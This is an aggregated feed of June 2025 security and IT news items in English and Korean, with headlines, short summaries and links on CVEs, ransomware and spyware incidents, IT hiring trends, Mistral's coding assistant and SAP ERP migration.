The U.S. Department of State is offering a reward of up to $10 million for information leading to the identification or location of state-sponsored hackers linked to the RedLine infostealer malware and its alleged creator, Russian national Maxim Alexandrovich Rudometov. This bounty is part of the Rewards for Justice program, which was established under the 1984 Act to Combat International Terrorism. The initiative offers rewards to individuals who provide valuable information that helps identify or locate foreign government threat actors involved in cyberattacks against U.S. entities, especially those targeting critical infrastructure. The Department is specifically seeking tips about foreign government-linked […] The post U.S. Offers $10M Reward for Intel on RedLine Malware Hackers first appeared on Cybersafe News.

https://cybersafe.news/u-s-offers-10m-reward-for-intel-on-redline-malware-hackers/
Critical flaw in Cisco ISE impacts cloud deployments on AWS, Microsoft Azure, and Oracle Cloud Infrastructure
2025-06-05T08:31:27Z | 1749112287

Cisco fixed a critical flaw in the Identity Services Engine (ISE) that could allow unauthenticated attackers to conduct malicious actions. A vulnerability tracked as CVE-2025-20286 (CVSS score 9.9) in cloud deployments of Cisco ISE on AWS, Microsoft Azure, and Oracle Cloud Infrastructure allows unauthenticated remote attackers to access sensitive data, perform limited administrative actions, modify […]

https://securityaffairs.com/178659/uncategorized/critical-flaw-in-cisco-ise-impacts-cloud-deployments-on-aws-microsoft-azure-and-oracle-cloud-infrastructure.html
#Infosec2025: Securing Endpoints is Still Vital Amid Changing Threats
2025-06-05T08:15:00Z | 1749111300

Endpoint and network security is still essential, even as malicious actors turn to supply chains, identities and AI

https://www.infosecurity-magazine.com/news/infosec2025-securing-endpoints/
Odoo Employee Database Allegedly Leaked by Insider, For Sale on Dark Web
2025-06-05T08:07:07Z | 1749110827

A 63.4MB database, purportedly containing sensitive employee information from the business management software company Odoo, is allegedly being offered for sale on a dark web forum. The seller claims the data was obtained via a “collaborative effort with a senior insider” from Odoo. Odoo is a prominent Belgian company that provides a suite of open-source […]

https://dailydarkweb.net/odoo-employee-database-allegedly-leaked-by-insider-for-sale-on-dark-web/
연봉과 수요 모두 상승 중···2025년 IT 핵심 직군 7선
2025-06-05T07:54:24Z | 1749110064

2025년에도 IT 업계는 데이터, 보안, 엔지니어링 분야를 중심으로 숙련된 인재 확보에 총력을 기울이고 있다. 전문가들은 소프트웨어 엔지니어링, 사이버보안, 데이터 관리 분야에서 우수 인재 확보 경쟁이 한층 심화될 것으로 내다봤다. 특히 기업들은 실무 경험과 유연성을 갖춘 인재를 선호하고 있으며, 변화에 대한 적응력을 핵심 자질로 꼽고 있다. AI 기술이 IT 업계 전반에 걸쳐 화두로 떠오른 가운데, 델로이트는 최근 보고서에서 MIT의 경제학자 대런 아세모글루의 분석을 인용해 “향후 10년 동안 AI 자동화로 사라질 일자리는 전체의 5%에 불과할 것”이라고 전망했다. AI의 신뢰성 문제와 인간의 판단이 여전히 필요한 업무가 많기 때문이다. 그러나 일부 IT 전문가들은 AI 기술이 자신들의 역량을 무력화시킬 수 있다는 불안감을 여전히 갖고 있다. 이와 동시에 AI 전환을 이끄는 역할을 수행하는 IT 직무의 수요는 급증하고 있다. 델로이트 보고서는 또 하나의 변화를 지적한다. 과거에는 비용 절감과 자동화 확대를 중심으로 기술 투자 전략이 수립됐지만, 이제는 기술을 통해 조직 전반의 장기적 가치를 창출하려는 채용 전략이 중요해졌다는 것이다. 다음은 2025년 현재 IT 조직 내에서 높은 비즈니스 가치를 창출하고 혁신을 주도하고 있는 주요 직무들이다. 수요 증가와 더불어 보상도 높은 직무들이다. 데이터 엔지니어 AI를 조직의 일상 업무에 통합하는 기업이 늘면서 데이터 엔지니어 수요도 급증하고 있다. 소프트웨어 아웃소싱 기업 바이어스데브(BairesDev)에서 인재 영입 부문을 총괄하는 에세키엘 루이스는 “2024년 한 해 동안 데이터 관련 채용 수요가 77% 증가했다”고 설명했다. 루이스는 “모든 산업 분야에서 AI 도입을 위해 데이터 전문가를 찾고 있다”라며 “수요 증가 속도가 매우 빠르다”고 전했다. 오라일리 미디어(O’Reilly Media)에서 신기술 콘텐츠 부문을 총괄하는 마이크 루카이디스 역시 AI 성공을 위해 데이터 과학의 중요성을 강조했다. 그는 “자신의 데이터가 가진 강점과 약점을 파악하고, 더 나은 데이터를 확보할 수 있는 방법을 아는 사람이 필요하다”며 “AI의 결과물이 기대에 부합하는지 검토하는 평가 작업, 이른바 ‘이밸(eval, evaluation의 줄임말로, AI 업계에서는 AI 모델의 성능을 평가하고 검증하는 작업 전반)’가 요즘 가장 뜨거운 주제 중 하나”라고 말했다. 사이버보안 전문가 사이버 공격이 날로 정교해짐에 따라 시스템 보안 관리자와 정보보안 분석가 등 관련 직무의 채용 수요가 급증하고 있다. 특히 AI 기반 공격의 확산은 보안 직무를 2025년 최고 연봉 직종 중 하나로 만들고 있다. 넥서스 IT 그룹(Nexus IT Group)의 매니징 디렉터인 트래비스 린드모엔은 “기업들이 윤리적 해커와 침투 테스터 채용을 확대하고 있다”고 말했다. 그는 “이제 수세적 방어는 효과가 없다”며 “공격자들은 자동화된 피싱, 변화무쌍한 악성코드, 서비스형 랜섬웨어 같은 수단을 사용하고 있다. 기업들은 이제 능동적인 보안 역량, 즉 시스템을 사전에 스트레스 테스트할 수 있는 역량이 필요하다”고 설명했다. 린드모엔은 특히 클라우드 보안과 윤리적 해킹 분야에서 실무 경험을 갖춘 인재를 찾기 어렵다는 점에서 글로벌 사이버보안 인력 부족은 기업에 심각한 리스크라고 지적했다. 루카이디스 역시 “대부분의 기업이 과거보다는 보안에 더 많은 투자를 하고 있지만, 여전히 보안은 큰 도전 과제”라며 “특히 AI가 공격 도구로 사용되거나 공격 대상으로 떠오르면서 문제는 더욱 복잡해지고 있다”고 진단했다. 플랫폼 엔지니어 델로이트의 휴먼캐피털 서비스 리더 네이트 페인터는 플랫폼 엔지니어에 대한 수요가 증가하고 있다고 전했다. 이들은 다른 엔지니어가 사용할 수 있는 기능과 플랫폼을 구축하고 통합하는 역할을 맡는다. 플랫폼 엔지니어링은 일부 선도 조직에서 IT 부문의 핵심 역할로 부상하고 있다. 페인터는 “플랫폼 엔지니어는 전체 플랫폼을 관리하며 비즈니스 솔루션 개발을 위한 기반을 제공한다”며 “현재 인프라 분야가 전성기를 맞고 있다”고 언급했다. 호스팅 기업 벌처(Vultr)의 최고마케팅책임자 케빈 코크레인은 “소프트웨어 개발과 배포를 보다 효율적이고 일관되며 확장 가능하게 만들 수 있는 플랫폼 엔지니어의 수요가 더욱 커질 것”이라고 분석했다. 그는 “가트너는 2026년까지 전체 소프트웨어 엔지니어링 조직의 80%가 내부 플랫폼 엔지니어링 팀을 구성해 애플리케이션 전달을 지원할 구성요소와 도구를 제공할 것으로 예측하고 있다”며 “이러한 팀은 소프트웨어 전달을 더 빠르고 쉽고 안전하게 만드는 역할을 한다”라고 설명했다. 그린테크 전문가 지속가능성을 중심으로 한 채용은 앞으로도 계속 확대될 전망이다. 점점 더 많은 기업이 환경 목표를 비즈니스 전략과 연계하면서, 에너지 효율 향상, 연결된 기기 관리, 넷제로(Net Zero) 달성 등을 지원할 수 있는 IT 인재에 대한 수요가 꾸준히 이어지고 있다. 델로이트의 페인터는 “데이터 관리에 드는 막대한 비용이 이러한 역할 수요를 주도하고 있다”며 “그린테크 플랫폼 엔지니어 같은 직무가 주목받는 것은 놀라운 일이 아니다. 다만, 이러한 역할이 데이터 엔지니어 역할에 통합되는 경우도 많다”고 설명했다. IT 채용 서비스 업체 VIQU IT 리크루트먼트의 설립자이자 대표인 매트 콜링우드는 수요가 높은 직무로 IoT 개발자와 지속가능성 중심의 클라우드 아키텍트를 꼽았다. 그는 “기술 업계 구조조정과 경기 침체에도 불구하고 그린에너지 분야 전문가에 대한 수요는 꾸준히 증가하고 있다”라며 “그린테크가 곧 수요의 중심”이라고 전했다. 프로덕트 매니저 기술 솔루션이 고객과 비즈니스의 요구를 충족하도록 이끄는 핵심 역할로서 프로덕트 매니저의 중요성은 여전히 높다. 특히 최근 기업들이 전통적인 IT 프로젝트보다 제품 중심의 IT 전략을 채택하면서 그 역할이 더욱 부각되고 있다. 델로이트의 페인터는 “2025년에는 기술 자체가 비즈니스가 되는 시대”라며 “혁신을 이끄는 프로덕트 매니저가 필요하다”고 강조했다. 이 직무는 점점 더 최고경영진의 관심을 받는 영역으로 성장하고 있으며, 현대의 프로덕트 매니저는 제품 수명 주기에 대한 깊은 이해, 명확한 커뮤니케이션 역량, 그리고 조직의 목표를 뒷받침하는 비즈니스 기획 능력을 갖춰야 한다. 페인터는 “최근에는 이 직무에서 요구되는 역량도 변하고 있다”며 “기초적인 인간적 역량에 대한 중요성이 커지고 있고, 동료를 설득할 수 있는 영향력이 요구된다”고 분석했다. 소프트웨어 엔지니어 소프트웨어 엔지니어는 여전히 IT 업계에서 가장 핵심적이면서도 충원하기 어려운 직무 중 하나로 꼽힌다. AI, 네트워킹, 클라우드 환경 등 주요 분야 전반에서 수요가 견고하게 유지되고 있다. 델로이트의 페인터는 “완전히 새로운 직무보다는 기존 소프트웨어 개발 직무가 점차 세분화되고 특화되고 있다”며 “AI 엔지니어와 네트워크 엔지니어, 일반 클라우드 엔지니어와 클라우드 네이티브 전문가 등으로 분화되고 있다”고 전했다. 오라일리 미디어의 루카이디스는 “기술 업계에 구조조정이 있었음에도 여전히 프로그래머는 필요하다”라며 “지금은 AI를 잘 다룰 줄 아는 인재가 더욱 요구되는 시기”라고 말했다. 그는 이어 “단순한 문제는 아니다. AI 역시 입력이 쓰레기면 출력도 쓰레기다. 자연어 프롬프트가 어설프게 작성되면 형편없는 코드만큼이나 쓸모없다”라고 덧붙였다. 클라우드 및 데브옵스 엔지니어 클라우드 전환은 대부분의 기업에 여전히 최우선 과제이며, 이를 지원하고 최적화하며 자동화할 수 있는 엔지니어에 대한 수요는 지속적으로 증가하고 있다. 클라우드 아키텍트와 데브옵스 엔지니어는 시스템 운영, 애플리케이션 배포 간소화, 안정적인 운영을 책임지는 핵심 인력이다. 넥서스 IT 그룹의 린드모엔은 “클라우드 아키텍트는 최대 19만 4,000달러의 연봉을 받을 수 있으며, 데브옵스 엔지니어에 대한 수요는 전년 대비 24% 증가했다”고 설명했다. 인포테크 리서치 그룹(Info-Tech Research Group)의 연구 책임자 브리태니 루츠는 “클라우드 아키텍트는 보안 분석가, 데이터·AI 엔지니어와 함께 가장 많이 채용되는 기술 직무 중 하나”라며 “이들 직무는 채용이 가장 어려운 분야이기도 하며, 올해도 많은 조직이 인력 확보에 큰 어려움을 겪을 것으로 보인다”라고 전망했다. 루카이디스는 일부에서 클라우드 리패트리이션(데이터센터 회귀)에 대한 논의가 나오고 있지만, 실제로는 여전히 클라우드로의 이동이 지속되고 있다고 밝혔다. 그는 “특히 AI는 클라우드 도입을 더욱 가속화하고 있다”며 “대규모 AI를 실행할 수 있는 온프레미스 데이터센터 구축은 현실적으로 어렵기 때문에, 클라우드 환경에서 애플리케이션을 배포·운영할 수 있는 인력이 계속 필요하다. 클라우드는 현대 인프라의 필수 요소”라고 설명했다. IT 솔루션 업체 카세야(Kaseya)에서 글로벌 채용을 총괄하는 에릭 룬드 역시 자사와 업계 전반에서 데브옵스 직무가 매우 인기 있는 채용 분야로 남아 있다고 밝혔다. 그는 “데브옵스는 지난해 우리 조직에서 가장 수요가 높은 직무였으며, 향후에도 중요성이 커질 것으로 본다”며 “AI 자동화와 함께 역할이 진화하겠지만, 여전히 가장 주목받는 분야일 것”이라고 전했다. 역량을 쌓고 변화를 수용하자 IT 커리어를 시작하는 신입 인재에게 전문가들은 기술 변화에 맞춰 새로운 역량을 습득하고 이를 유연하게 적용할 수 있는 태도가 성공의 열쇠라고 조언한다 핀테크 기업 애비드익스체인지(AvidXchange)의 최고정보책임자(CIO)인 안젤릭 M. 깁슨은 “현재 수요가 높다고 해서 특정 경로에 얽매일 필요는 없다”라며 “IT 전반에서 미래를 형성하는 영역을 중심으로 문을 열어줄 수 있는 견고한 기반을 쌓는 데 집중해야 한다”라고 강조했다. 깁슨은 파이썬, 자바, 자바스크립트 등 널리 사용되는 프로그래밍 언어와 주요 클라우드 플랫폼에 대한 실무 경험을 쌓을 것을 추천했다. 또한 AWS 공인 솔루션스 아키텍트(AWS Certified Solutions Architect), 공인 윤리적 해커(Certified Ethical Hacker), 구글 데이터 엔지니어(Google Data Engineer), 마이크로소프트 애저 클라우드(Azure cloud) 등의 자격증도 실무에 바로 투입될 수 있는 능력을 증명하는 데 도움이 된다고 조언했다. 신기술 기반의 기회에 대해 오라일리의 루카이디스는 AI와의 상호작용 방식을 개선할 필요성을 제기했다. 그는 “챗GPT가 등장한 이후 AI의 적절한 인터페이스는 채팅이라는 전제가 굳어졌다”라며 “하지만 이는 반드시 옳은 가정이 아니다. 현재 인터페이스는 모두 단일 사용자 중심이지만, 실제 업무는 대부분 팀 기반으로 이뤄진다. AI를 위한 새로운 사용자 인터페이스를 설계하는 일은 이제 막 시작된 흥미로운 영역”이라고 설명했다. 바이어스데브의 루이스는 커리어 선택을 단순한 시장 수요에만 기반해선 안 된다고 지적했다. 그는 “커리어 선택은 수요뿐 아니라 열정의 문제이기도 하다”며 “개인적으로는 파이썬을 추천한다. 이는 소프트웨어 개발, 데이터 과학, AI 등 다양한 분야로의 확장을 가능하게 한다. 결국 수요와 흥미가 교차하는 지점을 찾는 것이 장기적인 성공의 비결”이라고 강조했다. 인포테크 리서치 그룹의 루츠는 “서비스 데스크나 데스크톱 테크니션 같은 신입 직무가 점점 줄어들고 있다”고 언급하며, 커리어 초기에는 자격증 취득에 그치지 말고 학습한 내용을 실제에 적용할 수 있는 실력을 보여줘야 한다고 조언했다. 루츠는 “오늘날 많이 사용되는 기술 역량이 18개월 후에도 유효하다는 보장은 없다”라며 “특정 역량에만 집중하기보다는 새로운 도구를 배우고 이를 다양한 영역에 적용할 수 있는 적응력을 갖추는 것이 중요하다”라고 강조했다.dl-ciokorea@foundryco.com

https://www.cio.com/article/4002223/%ec%97%b0%eb%b4%89%ea%b3%bc-%ec%88%98%ec%9a%94-%eb%aa%a8%eb%91%90-%ec%83%81%ec%8a%b9-%ec%a4%91%c2%b7%c2%b7%c2%b72025%eb%85%84-it-%ed%95%b5%ec%8b%ac-%ec%a7%81%ea%b5%b0-7%ec%84%a0.html
Analysis of Spyware That Helped to Compromise a Syrian Army from Within
2025-06-05T07:53:42Z | 1749110022

The investigation into the collapse of the Assad regime reveals a significant technical dimension, particularly a spyware application named STFD-686 that was distributed among Syrian army officers via Telegram. This is a fascinating story where Android SpyMax spyware was able to exfiltrate sensitive data from solders smartphones and played a part in taking over the […] The post Analysis of Spyware That Helped to Compromise a Syrian Army from Within first appeared on Mobile Hacker.

https://www.mobile-hacker.com/2025/06/05/analysis-of-spyware-that-helped-to-compromise-a-syrian-army-from-within/
“SaaS형 코파일럿, 기업 환경에 한계”···미스트랄, 로컬배포·보안 강화한 AI 코딩 도구 출시
2025-06-05T07:44:54Z | 1749109494

미스트랄 코드는 보안과 컴플라이언스를 중시하는 대기업 환경을 대상으로 한 AI 코딩 어시스턴트로, AI 모델, IDE 내 어시스턴트, 로컬 배포 옵션, 엔터프라이즈용 툴링을 하나의 패키지로 통합한 것이 특징이다. 기반 기술은 오픈소스 AI 코딩 도구인 ‘컨티뉴(Continue)’를 활용했다. 현재 젯브레인IDE와 VS코드용 비공개 베타 버전으로 이 기술을 체험할 수 있으며, 정식 출시는 곧 이뤄질 예정이다. 미스트랄은 고객사 인터뷰를 통해 기존 SaaS 기반 AI 코딩 도구들의 한계를 파악했고, 이를 해결하기 위한 도구로 미스트랄 코드를 개발했다고 밝혔다. 기본 AI 코딩 도구의 주요 문제점으로는 ▲사내 리포지토리 및 내부 서비스와의 연결 제약 ▲모델 또는 프롬프트 커스터마이징의 어려움 ▲자동완성에 그치는 제한된 작업 범위 ▲모델, 플러그인, 인프라에 걸친 분산된 SLA 관리 문제 등을 꼽았다. 미스트랄은 공식 블로그를 통해 “미스트랄 코드 같은 단일 솔루션으로 모델, 플러그인, 관리자 제어 기능, 24시간 지원을 통합 제공하여 고객은 AI 도입 효과를 보다 명확히 파악할 수 있을 것”라며 “미스트랄 코드는 자체 코딩 전용 AI 모델을 제공하고, 즉각적인 자동완성부터 복잡한 리팩토링까지 지원하는 통합 플랫폼으로 클라우드, 전용 리소스, 또는 온프렘 GPU 환경 어디든 배포할 수 있다”라고 밝혔다. 미스트랄 코드는 각각 다른 용도에 특화된 4개의 AI 모델을 활용한다. 여기에는 코드 자동완성을 담당하는 ‘코데스트랄(Codestral)’, 코드 검색을 위한 ‘코데스트랄 임베드(Codestral Embed)’, 에이전트 기반 코딩을 수행하는 ‘데브스트랄(Devstral)’, 그리고 채팅 지원용 ‘미스트랄 미디엄(Mistral Medium)’이다. 미스트랄 코드는 또한 80개 이상의 프로그래밍 언어를 지원하며, 파일 분석, 깃 변경사항 추적, 터미널 출력 해석, 이슈 처리 등 복합적인 작업을 수행할 수 있다. 이때 기본 코드 제안을 넘어 파일 열기, 새 모듈 작성, 테스트 업데이트, 셸 명령 실행까지 포함한 문의 처리가 가능하다는 게 미스트랄의 설명이다. 미스트랄에 따르면, 프랑스 국영철도공사 SNCF는 4,000명의 개발자를 위해 미스트랄 코드 서버리스를 도입했으며, 글로벌 시스템 통합업체 캡제미니(Capgemini)도 미스트랄 코드를 온프레미스 환경에 적용해 1,500명 이상의 개발자에게 제공하고 있다.jihyun.lee@foundryco.com

https://www.cio.com/article/4002202/saas%ed%98%95-%ec%bd%94%ed%8c%8c%ec%9d%bc%eb%9f%bf-%ea%b8%b0%ec%97%85-%ed%99%98%ea%b2%bd%ec%97%90-%ed%95%9c%ea%b3%84%c2%b7%c2%b7%c2%b7%eb%af%b8%ec%8a%a4%ed%8a%b8%eb%9e%84-%eb%a1%9c.html
“ECC 고객사 절반이 ‘잔류 모드’··· SAP ERP 전환 난항”
2025-06-05T07:32:18Z | 1749108738

SAP가 지난달 미국 플로리다에서 개최한 연례 컨퍼런스 ‘사파이어(Sapphire)’에서는 통합 비즈니스 제품군(Business Suite)과 생성형 AI 에이전트 ‘줄(Joule)’에 대한 내용이 강조됐다. 하지만 주력 ERP 솔루션인 S/4HANA로의 고객사 전환 현황은 거의 언급되지 않았다. SAP 경영진은 기존 ERP 시스템인 ECC에서 S/4HANA로의 전환을 얼마나 이끌었는지에 대한 진척 상황을 공개하지 않았다. 많은 고객에게 ECC의 기술지원 종료 시점이 2027년 말로 다가오고 있음에도 불구하고 구체적인 설명은 없었다. 가트너(Gartner)의 기술 및 서비스 공급자 부문 부사장 파비오 디 카푸아는 “SAP 경영진이 전환 현황에 대해 언급을 피한 것은 놀랍지 않다”라고 말했다. 그는 “회의적인 분석가로서 벤더가 수치를 공개하지 않는다면 결과가 좋지 않다는 의미로 받아들인다. 결과가 좋았다면 ‘우리가 해냈다’라며 먼저 소리쳤을 것”이라고 설명했다. 수치로 보는 S/4HANA 도입 현황 가트너에 따르면 2024년 말 기준 SAP ECC 고객사 약 3만 5,000곳 중 39%(약 1만 4,000곳)만 S/4HANA로 전환을 마친 것으로 나타났다. 이 추세가 이어질 경우 2027년까지 1만 7,000곳, 즉 전체의 절반에 가까운 고객사가 여전히 ECC를 사용할 것으로 전망된다. 또한 가트너는 2030년까지도 ECC를 사용하는 기업이 1만 3,000곳 이상일 것이라고 예상했다. IDC 엔터프라이즈 소프트웨어 부문 부사장 미키 노스 리자는 이보다 낙관적으로 전망했지만 차이는 크지 않았다. 그는 2027년까지 ECC 고객의 40~45%가 여전히 해당 솔루션을 유지할 것이라고 내다봤다. SAP는 2015년 말 S/4HANA를 처음 출시했으며, 2021년 1월에는 ‘라이즈(RISE)’ 전환 프로그램도 선보였다. 하지만 디 카푸아는 기업의 전환 속도가 꾸준하되 느리다고 지적했다. 또한 SAP는 2023년 3월에 중기업 대상의 ‘그로우(GROW)’ 프로그램도 출시한 바 있다. 디 카푸아는 “SAP가 고객을 라이즈로 전환시키려 할 때, 우리는 ‘수년간 절반도 설득하지 못했는데, 나머지를 5년 안에 어떻게 전환시킬 계획인가’라고 물었다”라고 언급했다. 그는 ECC 시스템의 복잡성, 특히 맞춤형으로 설계된 시스템 규모와 마이그레이션 비용을 2가지 주요 걸림돌로 지적했다. 일부 프로젝트는 200만 달러 수준에서 진행되지만, 대기업의 복잡한 시스템은 최대 10억 달러에 이를 수 있다는 설명이다. 디 카푸아는 가트너가 고객사와 3~7년에 걸친 전환 프로젝트를 수행해 왔다며, 단순한 시스템 이전이 아닌 전면적인 업무 프로세스 재설계와 변화 관리 체계 수립이 필요한 경우가 많다고 설명했다. 일부 기업은 추가적으로 인사(HCM)나 조달 솔루션까지 도입해야 하는 상황에 직면해 있다고 덧붙였다. 서드파티 지원 업체 많은 SAP 고객사가 ECC에 대해 외부 벤더의 기술 지원을 검토하거나, SAP가 지원 종료 시점을 또다시 연장할 것을 기대하고 있다. 실제로 SAP는 과거에도 일정을 여러 차례 늦춘 전례가 있다. SAP는 지난 2월 새로운 전환 옵션인 ‘SAP ERP 프라이빗 에디션 전환 옵션(SAP ERP, private edition, transition option)’을 발표하기도 했다. 이는 일부 대형 고객사를 대상으로 ECC 사용을 2033년까지 연장할 수 있도록 허용한다. 일부 SAP 고객사들은 ERP의 특정 기능을 외부 벤더를 통해 보완하는 방식을 택하고 있다. 디 카푸아는 특히 인사, 조달, 공급망 관리 기능에 대해 서드파티 솔루션을 도입하는 사례가 늘고 있다고 설명했다. IDC의 노스 리자는 고객들의 어려움을 인식한 SAP가 지원 종료 시점을 연장하고 새로운 전환 도구를 도입한 점은 높이 평가할 만하다고 언급했다. 그는 “SAP는 고객사가 어디에서 어려움을 겪고 있는지를 인식하기 시작했다. 기존 제품군에서 새로운 제품군으로 전체 조직을 한꺼번에 마이그레이션하기가 어렵다는 점이 그중 하나였다”라고 말했다. 이어 “SAP는 고객이 전환 과정을 이해하고 실행할 수 있도록 지원하는 경로를 만들려 하고 있다”라고 설명했다. SAP “수요 높고 클라우드 전환도 순조롭다” SAP는 자사 제품과 클라우드 서비스, 특히 S/4HANA의 클라우드 버전에 대한 수요가 높아지고 있다고 밝혔다. SAP 아메리카 및 글로벌 비즈니스 제품군 사장 겸 최고수익책임자(CRO) 얀 길크는 2025년 1분기 SAP의 클라우드 매출이 지난해 동기 대비 약 26% 증가했다고 설명했다. 버스타인리서치(Bernstein Research)의 전무 겸 수석 애널리스트 마크 모어들러는 신규 클라우드 고객의 3분의 2가 완전히 새로운 고객이라는 점이 SAP에 긍정적인 신호라고 분석했다. 한편 길크는 SAP 고객이 ERP 기능을 외부 벤더의 솔루션으로 대체하고 있다는 디 카푸아의 지적에 반박했다. 그는 “오히려 생성형 AI 시대에는 독립적인 업무별 애플리케이션이 점점 의미를 잃고 있다. 클라우드 덕분에 데이터 접근 방식이 완전히 바뀌었고, 통합된 클라우드 솔루션 제품군에 대한 고객 수요가 커지고 있다”라고 밝혔다. 이와 관련해 IBM을 포함한 여러 기업은 S/4HANA로의 전환이 가져온 실질적인 효과를 언급했다. IBM의 경우 지난해 7월 SAP 클라우드 ERP 플랫폼으로 전환한 후 인프라 관련 운영 비용이 30% 감소했다고 밝혔다. 그럼에도 불구하고 애널리스트들은 SAP가 남은 ECC 고객을 설득하는 과정이 험난할 수 있다고 내다봤다. 포레스터(Forrester)의 엔터프라이즈 앱 및 서비스 부문 수석 애널리스트 악샤라 나이크 로페즈는 SAP가 클라우드 기반 서비스로 유도하는 과정에서 일부 ECC 고객이 이미 하이퍼스케일러와 체결한 계약을 이유로 전환을 주저하고 있다고 말했다. 그는 “많은 기업들이 다양한 애플리케이션을 사용하고 있으며, 이를 AWS나 애저(Azure) 같은 플랫폼으로 이전해 속도를 높이고 있다”라며 “대규모 클라우드 계약을 체결한 상태인 만큼, 고객들은 그 계약을 활용해 S/4HANA를 하이퍼스케일러 위에서 호스팅하길 원하고 있다”라고 분석했다. 또한 나이크 로페즈는 고객들의 불만이 커지면서 SAP가 지난해 2분기부터 대규모 할인 정책을 도입했다며, 이런 정책에 불구하고 2027년 이후에 전체 ECC 고객의 40% 이상이 기존 ERP를 사용할 가능성이 있다고 전망했다. 특히 정기적인 버전 업데이트와 기타 수정 사항을 꾸준히 적용해 온 경우, 전환 압박을 거의 느끼지 않는 것으로 보인다고 그는 진단했다. 그는 “이들 기업에 물어보면 ‘우리의 ECC 환경은 매우 견고하고 안정적이다’라고 답할 것”이라며 “SAP의 기술 지원이 종료된다고 해서 시스템이 갑자기 멈추거나, 과거에 없던 문제가 새롭게 발생하는 것은 아니다. 환경은 예전과 똑같이 작동할 것”이라고 강조했다.dl-ciokorea@foundryco.com

https://www.cio.com/article/4002196/ecc-%ea%b3%a0%ea%b0%9d%ec%82%ac-%ec%a0%88%eb%b0%98-%ec%9d%b4%ec%83%81-%ec%9e%94%eb%a5%98-%eb%aa%a8%eb%93%9c%c2%b7%c2%b7%c2%b7-sap-erp-%ec%a0%84%ed%99%98-%eb%82%9c%ed%95%ad.html
Interlock ransomware claims Kettering Health breach, leaks stolen data
2025-06-05T07:31:11Z | 1749108671

The Interlock ransomware gang has claimed a recent cyberattack on the Kettering Health healthcare network and leaked data allegedly stolen from breached systems.

https://www.bleepingcomputer.com/news/security/interlock-ransomware-claims-kettering-health-breach-leaks-stolen-data/
Get out of the audit committee: Why CISOs need dedicated board time
2025-06-05T07:00:00Z | 1749106800

Adequate time with the board is in short supply for CISOs and this restricted engagement is leaving organizations unprepared to fully understand and manage enterprise risk. Time for the cybersecurity agenda is often limited to quarterly board committee sessions and annual full boards meetings, according to an Advanced Cyber Security Center report. In practice, this means most CISOs are only given a 15 to 45-minute slot on a crowded agenda in a board risk, audit or technology committee meeting and similar time at the board’s annual meeting. “Cyber usually starts off on the calendar being an hour, and then it gets squished down to a half hour, and then sometimes you’re lucky if it’s 15 minutes, which is just horrendous,” says George Gerchow, faculty at IANS Research and Bedrock Security’s CSO. Cybersecurity is boxed into operational or compliance updates, keeping it separate and distinct from broader business strategy and risk management. “At some public companies, it will most likely get attention from the audit committee and probably very little time with the actual board itself,” says Gerchow. “The thing about the audit committee is that they care about compliance and it’s not really a cybersecurity risk discussion,” he says. Adding to the challenges, boards often lack the tools, context or structure to challenge and influence cyber strategy effectively. Because of this and the reduced time allowed to CISOs, boards end up just receiving reports rather than valuable feedback. Boards need to be well-versed in cyber risks, this means treating cybersecurity as a strategic business risk, not an isolated technical issue. What sometimes drives board interaction is a security incident, says Gerchow. “Then the questions are ‘Why? Why did we wait until it got to this point?’” Dedicated board time means open discussions about cyber risks Keeping cybersecurity as a separate agenda item means organizations aren’t automatically considering one of their greatest risks in overall strategic business reviews, according to the ACSC. The problem is the limited time allocated to CISOs in audit committee meetings is not sufficient for comprehensive cybersecurity discussions. Increasingly, more time is needed for conversations around managing the complex risk landscape. In previous CISO roles, Gerchow had a similar cadence, with quarterly time with the security committee and quarterly time with the board. He also had closed door sessions with only board members. “Anyone who’s an employee of the company, even the CEO, has to drop off the call or leave the room, so it’s just you with the board or the director of the board,” he tells CSO. He found these particularly important for enabling frank conversations, which might centre on budget, roadblocks to new security implementations or whether he and his team are getting enough time to implement security programs. “They may ask: ‘How are things really going? Are you getting the support you need?’ It’s a transparent conversation without the other executives of the company being present.” Gerchow found it a valuable opportunity to discuss things openly without regard for lines of responsibility or other impediments to frank conversations. “I’m one who’ll speak my mind, but I know other CISOs won’t in a regular board meeting with the CEO, the CFO or whomever they report to. They’re more likely to stick with progress made against risks.” The full partnership model between CISO and board Full and frank security discussions are more than just a ‘nice to have’. The SEC has indicated it expects public companies with senior leadership to be transparent in how they assess and communicate cybersecurity risks. By extension, CISOs have an important role in communicating risks to senior leadership and the board. To provide strategic insights, CISOs need to avoid excessive technical details and instead use consistent frameworks, risk registers, and resilience metrics. At Liberty Mutual, cybersecurity is reported to the board as both a standalone topic and as part of broader technology strategy discussions. “There’s value in reporting to the full board so that all directors have some exposure to cyber trends and the health of the cybersecurity program,” says Liberty Mutual CISO Katie Jenkins. Jenkins finds both approaches valuable, with the standalone conversation narrowing in on risks and mitigation strategies, while the integration into technology discussions demonstrates that security is not an isolated function. “Effective security outcomes depend on a cross-functional commitment across the organization,” she says. “When I present to the board, my goals are to educate on current trends and emerging threats, clarify risks — avoiding both underrepresentation and overrepresentation — and instill confidence that we allocate our resources effectively to align with those risks.” Jenkins aims to develop a “dialogue over a monologue” to understand the board’s most pressing questions and tailor her presentation to provide greater clarity or incorporate relevant examples in line with their focus. To do so, Jenkins is guided by three principles in her presentations. Firstly, be clear about relating risks to business impact to make the issues more tangible and relevant to board members. “When discussing incidents or risks, I connect them to their potential impact on business operations. Use demonstrations to show threats in action. This provides clarity and helps build trust, moving beyond “just trust me on this” to show real-time examples of our efforts. “In a recent board update, I used demos to show the ease of use of toolkits favored by adversaries and showcased the before-and-after effects of implementing specific security controls.” Finally, Jenkins also makes a point of highlighting how security is also a driver of innovation. “I emphasize how security enables innovation by providing guardrails, which serves as a nice complement to the more defensive aspects of our work.” Shifting away from purely committee reporting isn’t just a tactical move. It reflects the growing need to have CISOs provide input into many business initiatives. Jenkins believes CISOs can offer valuable input into AI adoption, operational resilience, technology modernization, data and digital transformation, mergers and acquisitions, supplier and procurement strategies, and geopolitical risk management. “Our contributions extend beyond just cybersecurity incidents; we also play a vital role in enterprise risk management and crisis response,” she says.

https://www.csoonline.com/article/3999922/get-out-of-the-audit-committee-why-cisos-need-dedicated-board-time.html
CVE-2025-47966 Power Automate Elevation of Privilege Vulnerability
2025-06-05T07:00:00Z | 1749106800

Exposure of sensitive information to an unauthorized actor in Power Automate allows an unauthorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47966
AI kept 15-year-old zombie vuln alive, but its time is drawing near
2025-06-05T06:29:12Z | 1749104952

